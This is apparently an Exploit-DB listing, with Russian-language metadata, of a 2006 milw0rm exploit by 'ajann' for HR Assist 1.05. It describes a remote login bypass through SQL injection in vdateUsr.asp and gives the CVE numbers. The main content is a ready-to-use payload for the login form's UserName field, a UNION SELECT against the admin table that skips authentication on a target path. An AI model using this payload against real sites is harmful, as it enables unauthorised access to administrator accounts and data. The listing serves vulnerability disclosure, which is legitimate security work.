Exploit HR Assist 1.05 - 'vdateUsr.asp' Remote Authentication Bypass

[Exploiter]

EDB-ID

2909

Проверка EDB

1. Пройдено

Автор

AJANN

Тип уязвимости

WEBAPPS

Платформа

ASP

CVE

cve-2006-6525 cve-2006-6524

Дата публикации

2006-12-09

*******************************************************************************
# Title   :  HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass SQL Injection
# Author  :  ajann
# Page    :  http://www.ezhrs.com
# Contact :   :(
# $$$     :  $45

*******************************************************************************
Example:

###http://[target]/[path]/

UserName: ' union select 0,0,0,0,0,0,0,0,0,0,0,0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]